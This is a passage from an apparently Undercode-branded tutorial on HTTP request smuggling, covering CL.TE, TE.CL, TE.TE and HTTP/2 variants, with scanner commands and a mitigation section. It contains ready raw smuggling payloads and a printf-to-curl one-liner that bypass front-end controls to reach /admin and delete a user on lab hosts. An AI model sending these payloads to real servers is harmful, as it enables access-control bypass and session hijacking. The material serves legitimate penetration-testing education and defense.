Listen to this Post

Introduction:
HTTP Request Smuggling (CWE-444) is a critical vulnerability class that arises when front-end and back-end servers disagree on where an HTTP request begins and ends. By exploiting these parsing discrepancies, attackers can “smuggle” a hidden malicious request inside a legitimate one, leading to cache poisoning, session hijacking, and complete bypass of access controls. This guide breaks down the CL.TE, TE.CL, TE.TE, and HTTP/2 variants, providing practical detection and exploitation techniques for bug bounty hunters and penetration testers.
Learning Objectives:
- Understand the root cause of HTTP Request Smuggling and the parsing discrepancies between Content-Length and Transfer-Encoding headers
- Master the detection and exploitation of CL.TE, TE.CL, TE.TE, and HTTP/2 downgrade smuggling attacks
- Learn to use automated tools like Smugglex, HTTP Request Smuggler Burp extension, and Nuclei templates for efficient vulnerability discovery
1. Understanding the Core Mechanics: Content-Length vs. Transfer-Encoding
HTTP Request Smuggling exploits the fundamental ambiguity in how HTTP/1.1 determines request boundaries. Two headers are at the heart of this confusion:
- Content-Length (CL): Specifies the exact byte length of the message body.
- Transfer-Encoding (TE): Uses chunked encoding, where the body is split into chunks, each preceded by its size in hexadecimal.
When a front-end proxy and back-end server prioritize these headers differently, desynchronization occurs. The attacker sends a request that appears complete to one server but continues into the next request for the other. This discrepancy allows the smuggled request to be processed in the context of a subsequent user’s session, bypassing security controls entirely.
Key Concept: The vulnerability exists because the HTTP/1.1 specification allows both headers, but doesn’t strictly define precedence, leaving it to individual server implementations.
- CL.TE Exploitation: Front-End Uses Content-Length, Back-End Uses Transfer-Encoding
In a CL.TE vulnerability, the front-end server respects the `Content-Length` header, while the back-end server prioritizes Transfer-Encoding: chunked. The attacker crafts a request where the `Content-Length` indicates a short body, but the chunked encoding contains a smuggled second request.
Step-by-Step Exploitation (PortSwigger Lab Example):
- Identify the Vulnerability: Send a request with both `Content-Length` and `Transfer-Encoding: chunked` headers and observe time delays or unexpected responses.
- Craft the Malicious Request: The following example smuggles a `GET /admin` request to bypass front-end access controls:
POST / HTTP/1.1 Host: vulnerable-lab.com Content-Type: application/x-www-form-urlencoded Content-Length: 37 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 X-Ignore: X
- The front-end sees `Content-Length: 37` and reads only up to the
0\r\n\r\n, considering the request complete. - The back-end processes
Transfer-Encoding: chunked, sees the `0` chunk (terminator), and interprets the subsequent `GET /admin` as the start of the next request.
- Refine the Payload: If the admin panel requires a specific `Host` header, include it in the smuggled request:
POST / HTTP/1.1 Host: vulnerable-lab.com Content-Type: application/x-www-form-urlencoded Content-Length: 54 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: localhost X-Ignore: X
4. Execute the Attack: Send the request twice. The first request smuggles the payload; the second request’s headers are appended to the smuggled request body, completing the attack. To delete a user, modify the smuggled request:
POST / HTTP/1.1 Host: vulnerable-lab.com Content-Type: application/x-www-form-urlencoded Content-Length: 139 Transfer-Encoding: chunked 0 GET /admin/delete?username=carlos HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=
Linux Command (using curl with raw HTTP):
printf "POST / HTTP/1.1\r\nHost: vulnerable-lab.com\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 37\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nX-Ignore: X\r\n\r\n" | curl -v --raw -H "Host: vulnerable-lab.com" --data-binary @- http://vulnerable-lab.com
- TE.CL Exploitation: Front-End Uses Transfer-Encoding, Back-End Uses Content-Length
In a TE.CL vulnerability, the front-end server uses Transfer-Encoding, while the back-end server relies on Content-Length. The attacker exploits this by making the front-end process chunked encoding but the back-end truncates the request based on the `Content-Length` value.
Step-by-Step Exploitation (PortSwigger Lab Example):
- Disable “Update Content-Length” in Burp Repeater: This is crucial to prevent Burp from automatically correcting the length fields.
- Craft the Malicious Request: The following example smuggles a `POST /admin` request:
POST / HTTP/1.1 Host: vulnerable-lab.com Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 60 POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
- The front-end sees
Transfer-Encoding: chunked, processes the chunks (60= 96 bytes of data, then `0` terminator), and forwards the entire request. - The back-end sees
Content-Length: 4, reads only the first 4 bytes of the body (60\r\n), and interprets the remaining data (POST /admin...) as the start of the next request.
- Include the Host Header: Add `Host: localhost` to the smuggled request to bypass host-based restrictions:
POST / HTTP/1.1 Host: vulnerable-lab.com Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 71 POST /admin HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
4. Delete a User: Modify the smuggled request to perform destructive actions:
POST / HTTP/1.1 Host: vulnerable-lab.com Content-length: 4 Transfer-Encoding: chunked 87 GET /admin/delete?username=carlos HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
Note: Ensure the trailing `\r\n\r\n` after the final `0` is included.
4. TE.TE Exploitation: Obfuscating Transfer-Encoding Headers
In a TE.TE vulnerability, both servers support Transfer-Encoding, but one can be tricked by obfuscating the header. The attacker sends multiple or malformed `Transfer-Encoding` headers, causing one server to ignore the header while the other processes it.
Obfuscation Techniques:
- Duplicate Headers: `Transfer-Encoding: chunked` (twice)
- Case Variation: `TrAnSfEr-EnCoDiNg: chunked`
– Whitespace Injection: `Transfer-Encoding : chunked` or `Transfer-Encoding: chunked` with a tab - Invalid Encoding Names: `Transfer-Encoding: xchunked` (one server may ignore it)
Example Payload:
POST / HTTP/1.1 Host: vulnerable-lab.com Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked Transfer-Encoding: x 5c POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
Here, one server processes `Transfer-Encoding: chunked` (first header), while the other sees `x` (invalid) and falls back to Content-Length: 4, creating the desync.
5. HTTP/2 Request Smuggling: The Modern Attack Surface
HTTP/2 introduces new smuggling vectors, particularly when front-end servers downgrade HTTP/2 requests to HTTP/1.1 for legacy back-ends. Attackers can inject headers or manipulate the request stream to create desynchronization.
Key HTTP/2 Smuggling Techniques:
- Header Injection: Injecting malicious headers into an HTTP/2 request that are misinterpreted after downgrade
- CRLF Injection: Injecting `%0d%0a` sequences into header values to split requests
- Request Tunneling: Using HTTP/2’s multiplexing to tunnel a smuggled request through a single connection
Detection with Smugglex:
Smugglex is a Rust-powered scanner that detects HTTP/2 downgrade smuggling (H2.CL / H2.TE) by speaking real HTTP/2 (ALPN h2) and testing for desynchronization.
Installation (Linux/macOS):
brew install hahwul/smugglex/smugglex
Basic Scan:
smugglex https://target.com -v -o results.json
Replay a Burp Request:
smugglex --raw-request request.txt -H "X-Collab: your-collaborator.com"
JSON Output for Automation:
smugglex --json https://target.com | jq '.summary.vulnerable_targets'
6. Automated Tools and Advanced Detection Techniques
HTTP Request Smuggler (Burp Suite Extension):
This extension, developed by PortSwigger researcher James Kettle, automatically detects and exploits smuggling vulnerabilities. Version 3.0 introduces parser discrepancy detection, bypassing widespread desync defences.
Installation:
- Via BApp Store: `Extender -> BApp Store -> HTTP Request Smuggler`
– Manual: Load `desynchronize-all.jar` via `Extender -> Extensions -> Add`
Features:
- CL.TE and TE.CL desync detection with timeout-based confirmation
- Automated exploit generation with Turbo Intruder integration
- Client-side desync detection for browser-powered attacks
Nuclei Template for Mass Scanning:
The `http1-desync.yaml` template automates detection of HTTP/1 desync vulnerabilities at scale.
Installation:
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Scan a Single Target:
nuclei -u https://example.com -t nuclei-templates/http1-desync.yaml
Scan Multiple Targets:
nuclei -l targets.txt -t nuclei-templates/http1-desync.yaml
HTTP/1 Desync Tester (Go Tool):
This comprehensive tool tests for V-H (Visible-Hidden) Desync, 0.CL (Zero Content-Length) Desync, Expect Header Desync, Double-Desync, and CL.TE Desync.
Build and Run:
git clone https://github.com/nconsolo/echteeteepee.git cd echteeteepee go mod download go build -o http1-desync-test http1-desync-test.go ./http1-desync-test -target https://example.com -test all -verbose
7. Mitigation and Defense Strategies
For Developers and System Administrators:
- Upgrade to HTTP/2 or HTTP/3: These protocols have built-in request framing, eliminating the ambiguity of HTTP/1.1.
- Normalize Request Parsing: Ensure all servers in the chain use the same HTTP parser and header precedence rules.
- Reject Ambiguous Requests: Configure servers to reject requests with both `Content-Length` and `Transfer-Encoding` headers.
- Use Cryptographic Message Binding: New IETF proposals suggest hop-by-hop header fields cryptographically bound to requests to detect desynchronization.
For Security Researchers:
- Primitive-Level Detection: Test for parsing discrepancies rather than known payloads to uncover novel vulnerabilities.
- Time-Based Detection: Send requests that cause a time delay in responses if a vulnerability is present.
- Fuzz All Headers: Use fuzzing techniques to test how servers handle malformed or obfuscated headers.
What Undercode Say:
- HTTP Request Smuggling remains one of the most lucrative bug bounty categories, with researchers earning over $350,000 from critical infrastructure fixes. The complexity of the attack vectors means fewer hunters possess the necessary skillset, leading to higher payouts for those who master it.
- The HTTP/1.1 protocol is fundamentally broken when it comes to request boundary definitions. As James Kettle’s research demonstrates, “extreme ambiguity” about where requests begin and end creates a permanent attack surface that cannot be fully patched without migrating away from HTTP/1.1. This means HTTP Request Smuggling will continue to yield critical vulnerabilities for years to come, making it an essential skill for any serious bug bounty hunter.
Prediction:
- +1 The release of advanced tools like Smugglex and HTTP Request Smuggler v3.0 with parser discrepancy detection will democratize smuggling discovery, leading to a surge in reported vulnerabilities and higher overall security for web applications.
- -1 As organizations gradually migrate to HTTP/2 and HTTP/3, legacy HTTP/1.1 stacks will become concentrated in outdated, poorly maintained systems, creating a “long tail” of high-risk, unpatched vulnerabilities that attackers will continue to exploit for years.
- +1 The growing awareness of HTTP Request Smuggling in the security community will drive innovation in defensive tooling, including cryptographic message binding and AI-powered anomaly detection, making it harder for attackers to exploit these flaws undetected.
- -1 The increasing complexity of modern web architectures—with multiple CDNs, load balancers, and microservices—expands the attack surface for smuggling, as each new component introduces potential parsing discrepancies.
- +1 Bug bounty programs will continue to offer substantial rewards for smuggling vulnerabilities, encouraging more researchers to develop expertise in this area and ultimately improving the security posture of the internet.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: The Ultimate – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


